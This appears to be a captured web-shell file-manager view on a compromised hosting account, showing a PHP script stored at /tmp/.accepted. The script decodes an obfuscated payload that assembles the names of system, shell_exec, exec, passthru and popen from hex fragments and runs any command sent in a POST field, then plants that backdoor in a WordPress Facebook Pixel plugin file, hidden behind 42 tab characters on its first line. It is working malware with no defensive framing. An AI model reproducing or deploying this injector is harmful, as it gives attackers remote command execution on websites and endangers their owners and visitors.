HEX
Server: Apache
System: Linux br512.hostgator.com.br 5.14.0-162.23.1.9991722448259.nf.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 31 18:11:45 UTC 2024 x86_64
User: stiliz28 (2548)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: //tmp/.accepted
<?php  $path = '/home1/tabela11/public_html/wp-content/plugins_old/official-facebook-pixel/vendor/facebook/php-business-sdk/src/FacebookAds/Object/ProductCatalogImageSettings.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24value1%20%3D%20%2779%27%3B%24value2%20%3D%20%2773%27%3B%24value3%20%3D%20%2774%27%3B%24value4%20%3D%20%276d%27%3B%24value5%20%3D%20%2768%27%3B%24value6%20%3D%20%2765%27%3B%24value7%20%3D%20%276c%27%3B%24value8%20%3D%20%2778%27%3B%24value9%20%3D%20%2770%27%3B%24value10%20%3D%20%2761%27%3B%24value11%20%3D%20%2772%27%3B%24value12%20%3D%20%275f%27%3B%24value13%20%3D%20%276e%27%3B%24value14%20%3D%20%2763%27%3B%24value15%20%3D%20%276f%27%3B%24value16%20%3D%20%2771%27%3B%24value17%20%3D%20%2776%27%3B%24event_dispatcher1%20%3D%20pack%28%22H%2A%22%2C%20%2773%27%20.%20%24value1%20.%20%24value2%20.%20%24value3%20.%20%2765%27%20.%20%24value4%29%3B%24event_dispatcher2%20%3D%20pack%28%22H%2A%22%2C%20%24value2%20.%20%24value5%20.%20%24value6%20.%20%276c%27%20.%20%24value7%20.%20%275f%27%20.%20%2765%27%20.%20%24value8%20.%20%2765%27%20.%20%2763%27%29%3B%24event_dispatcher3%20%3D%20pack%28%22H%2A%22%2C%20%24value6%20.%20%24value8%20.%20%24value6%20.%20%2763%27%29%3B%24event_dispatcher4%20%3D%20pack%28%22H%2A%22%2C%20%24value9%20.%20%24value10%20.%20%24value2%20.%20%2773%27%20.%20%2774%27%20.%20%24value5%20.%20%2772%27%20.%20%2775%27%29%3B%24event_dispatcher5%20%3D%20pack%28%22H%2A%22%2C%20%24value9%20.%20%276f%27%20.%20%24value9%20.%20%2765%27%20.%20%276e%27%29%3B%24event_dispatcher6%20%3D%20pack%28%22H%2A%22%2C%20%24value2%20.%20%2774%27%20.%20%24value11%20.%20%24value6%20.%20%2761%27%20.%20%24value4%20.%20%24value12%20.%20%2767%27%20.%20%2765%27%20.%20%2774%27%20.%20%24value12%20.%20%2763%27%20.%20%276f%27%20.%20%24value13%20.%20%24value3%20.%20%24value6%20.%20%24value13%20.%20%24value3%20.%20%24value2%29%3B%24event_dispatcher7%20%3D%20pack%28%22H%2A%22%2C%20%2770%27%20.%20%24value14%20.%20%24value7%20.%20%24value15%20.%20%24value2%20.%20%2765%27%29%3B%24request_approved%20%3D%20pack%28%22H%2A%22%2C%20%24value11%20.%20%24value6%20.%20%24value16%20.%20%2775%27%20.%20%24value6%20.%20%24value2%20.%20%2774%27%20.%20%24value12%20.%20%2761%27%20.%20%2770%27%20.%20%2770%27%20.%20%24value11%20.%20%24value15%20.%20%24value17%20.%20%24value6%20.%20%2764%27%29%3Bif%28isset%28%24_POST%5B%24request_approved%5D%29%29%7B%24request_approved%3Dpack%28%22H%2A%22%2C%24_POST%5B%24request_approved%5D%29%3Bif%28function_exists%28%24event_dispatcher1%29%29%7B%24event_dispatcher1%28%24request_approved%29%3B%7Delseif%28function_exists%28%24event_dispatcher2%29%29%7Bprint%20%24event_dispatcher2%28%24request_approved%29%3B%7Delseif%28function_exists%28%24event_dispatcher3%29%29%7B%24event_dispatcher3%28%24request_approved%2C%24res_entry%29%3Bprint%20join%28%22%5Cn%22%2C%24res_entry%29%3B%7Delseif%28function_exists%28%24event_dispatcher4%29%29%7B%24event_dispatcher4%28%24request_approved%29%3B%7Delseif%28function_exists%28%24event_dispatcher5%29%26%26function_exists%28%24event_dispatcher6%29%26%26function_exists%28%24event_dispatcher7%29%29%7B%24flg_ptr%3D%24event_dispatcher5%28%24request_approved%2C%22r%22%29%3Bif%28%24flg_ptr%29%7B%24ent_descriptor%3D%24event_dispatcher6%28%24flg_ptr%29%3B%24event_dispatcher7%28%24flg_ptr%29%3Bprint%20%24ent_descriptor%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');